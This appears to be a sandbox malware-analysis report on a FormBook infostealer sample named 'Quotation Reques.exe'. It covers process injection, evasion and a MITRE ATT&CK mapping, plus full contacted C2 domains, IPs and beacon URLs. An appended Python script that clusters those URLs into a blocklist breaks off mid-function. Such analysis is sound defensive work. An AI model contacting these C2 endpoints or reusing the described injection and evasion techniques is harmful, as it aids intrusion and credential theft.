          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_003A3C49 GetSystemTime, SystemTimeToFileTime
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_0038443C GetVersion
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Techniques listed per tactic column (trailing digits are kept as they appear in the report's matrix cells):

          Initial Access: Valid Accounts1; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: Scheduled Task/Job1; Shared Modules1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
          Persistence: Valid Accounts1; Scheduled Task/Job1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Privilege Escalation: Valid Accounts1; Access Token Manipulation1; Process Injection612; Scheduled Task/Job1; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Defense Evasion: Masquerading1; Valid Accounts1; Access Token Manipulation1; Virtualization/Sandbox Evasion4; Disable or Modify Tools1; Process Injection612; Deobfuscate/Decode Files or Information1; Obfuscated Files or Information41; Software Packing13
          Credential Access: Input Capture1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: System Time Discovery1; Security Software Discovery351; Virtualization/Sandbox Evasion4; Process Discovery2; Remote System Discovery1; File and Directory Discovery2; System Information Discovery125; Network Service Scanning; System Network Connections Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
          Collection: Input Capture1; Archive Collected Data1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control: Encrypted Channel1; Ingress Tool Transfer3; Non-Application Layer Protocol3; Application Layer Protocol13; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

          Behavior Graph

          Behavior Graph ID: 356530 | Sample: Quotation Reques.exe | Start date: 23/02/2021 | Architecture: WINDOWS | Score: 100

          Start (node 2)
            DNS/IP: www.thedesailldada.com; www.buildermarketingprogram.com
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 14 other signatures
            started: Quotation Reques.exe (node 11)
          Quotation Reques.exe (node 11)
            dropped: C:\Users\user\AppData\Roaming\ftkqUsB.exe (PE32); C:\Users\user\...\ftkqUsB.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp1923.tmp (XML); C:\Users\user\...\Quotation Reques.exe.log (ASCII)
            Signatures: Injects a PE file into a foreign processes
            started: Quotation Reques.exe (node 15); schtasks.exe (node 18)
          Quotation Reques.exe (node 15)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            injected: explorer.exe (node 20)
          schtasks.exe (node 18)
            started: conhost.exe (node 24)
          explorer.exe (node 20)
            DNS/IP: www.trainingkanban.com 51.83.43.226, 49741, 80 OVHFR France; www.dorteklarskov.com 194.9.94.85, 49743, 80 LOOPIASE Sweden; 13 other IPs or domains
            Signatures: System process connects to network (likely due to code injection or exploit)
            started: cmd.exe (node 26)
          cmd.exe (node 26)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            started: cmd.exe (node 29)
          cmd.exe (node 29)
            started: conhost.exe (node 31)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Quotation Reques.exe | 26% | Virustotal |
          Quotation Reques.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
          Quotation Reques.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\ftkqUsB.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\ftkqUsB.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.Quotation Reques.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 | 100% | Avira URL Cloud | malware
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.gurumanindustries.com/0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sphenecouture.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt | 0% | Avira URL Cloud | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.ficuswildlife.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us | 0% | Avira URL Cloud | safe
          http://www.mojavewellnessaz.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 | 0% | Avira URL Cloud | safe
          http://www.dorteklarskov.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          www.valiantbranch.com/0wdn/ | 0% | Avira URL Cloud | safe
          http://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          thisisauckland.com | 77.72.1.202 | true | true | | unknown
          www.buildermarketingprogram.com | 208.97.149.17 | true | false | | unknown
          sphenecouture.com | 160.153.133.87 | true | true | | unknown
          www.trainingkanban.com | 51.83.43.226 | true | true | | unknown
          www.ficuswildlife.com | 138.197.103.178 | true | true | | unknown
          www.dorteklarskov.com | 194.9.94.85 | true | true | | unknown
          gurumanindustries.com | 194.59.164.34 | true | true | | unknown
          mojavewellnessaz.com | 107.180.46.143 | true | true | | unknown
          www.vanjele.com | unknown | unknown | true | | unknown
          www.mojavewellnessaz.com | unknown | unknown | true | | unknown
          www.sphenecouture.com | unknown | unknown | true | | unknown
          www.diabetessurgeryturkey.com | unknown | unknown | true | | unknown
          www.xlkefu2.com | unknown | unknown | true | | unknown
          www.thisisauckland.com | unknown | unknown | true | | unknown
          www.gurumanindustries.com | unknown | unknown | true | | unknown
          www.topkids.asia | unknown | unknown | true | | unknown
          www.thedesailldada.com | unknown | unknown | true | | unknown

                                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 | true | Avira URL Cloud: malware | unknown
http://www.gurumanindustries.com/0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 | true | Avira URL Cloud: safe | unknown
http://www.sphenecouture.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt | true | Avira URL Cloud: safe | unknown
http://www.ficuswildlife.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us | true | Avira URL Cloud: safe | unknown
http://www.mojavewellnessaz.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 | true | Avira URL Cloud: safe | unknown
http://www.dorteklarskov.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 | true | Avira URL Cloud: safe | unknown
www.valiantbranch.com/0wdn/ | true | Avira URL Cloud: safe | low
http://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 | true | Avira URL Cloud: safe | unknown
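Every entry in the Contacted URLs table shares the URI path /0wdn/ and, where a query string is present, the same v2MHc value, while nfuxZr differs per host. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it takes the eight URLs copied verbatim from the table, splits them into host, path and query parameters, clusters hosts by path, picks out the parameters whose value is stable across the set (the part worth putting in a detection rule), and emits a deduplicated host blocklist. The function names are illustrative. One caveat it handles: the nfuxZr values contain literal + and / characters, so they must not go through urllib.parse.parse_qsl, which would decode every + as a space and corrupt the indicator.

```python
"""Normalise and cluster the FormBook C2 URLs from the "Contacted URLs"
table. Added example, not part of the Joe Sandbox report: the URL list is
copied from the table above, the function names are illustrative."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: the eight entries of the "Contacted URLs" table,
# verbatim. The www.valiantbranch.com entry has neither scheme nor query,
# exactly as the report lists it.
CONTACTED_URLS = [
    "http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0",
    "http://www.gurumanindustries.com/0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0",
    "http://www.sphenecouture.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt",
    "http://www.ficuswildlife.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us",
    "http://www.mojavewellnessaz.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1",
    "http://www.dorteklarskov.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0",
    "www.valiantbranch.com/0wdn/",
    "http://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0",
]


def _parse_query(query):
    """Split a query string on '&' and on the first '=' only. The values in
    these URLs are base64-like and contain literal '+' and '/' characters;
    urllib.parse.parse_qsl would turn every '+' into a space and corrupt
    the indicator, so the split is done by hand and nothing is decoded."""
    params = {}
    for pair in query.split("&") if query else []:
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def parse_c2_url(url):
    """Return (host, path, params) for one URL. Entries without a scheme
    are prefixed with http:// so urlsplit places the host in netloc."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return parts.netloc.lower(), parts.path, _parse_query(parts.query)


def cluster_by_path(urls):
    """Group hosts by URI path. As the table above shows, every host this
    sample contacts shares one path, so this yields one cluster per build."""
    clusters = defaultdict(set)
    for url in urls:
        host, path, _ = parse_c2_url(url)
        clusters[path].add(host)
    return {path: sorted(hosts) for path, hosts in clusters.items()}


def shared_param_values(urls):
    """Return {name: value} for query parameters that carry the same value
    in every URL that has them (and occur at least twice). These are the
    stable values worth adding to a detection rule; parameters that differ
    per URL carry per-host data and are skipped."""
    values = defaultdict(set)
    occurrences = defaultdict(int)
    for url in urls:
        _, _, params = parse_c2_url(url)
        for name, value in params.items():
            values[name].add(value)
            occurrences[name] += 1
    return {name: next(iter(vals)) for name, vals in values.items()
            if len(vals) == 1 and occurrences[name] > 1}


def blocklist(urls):
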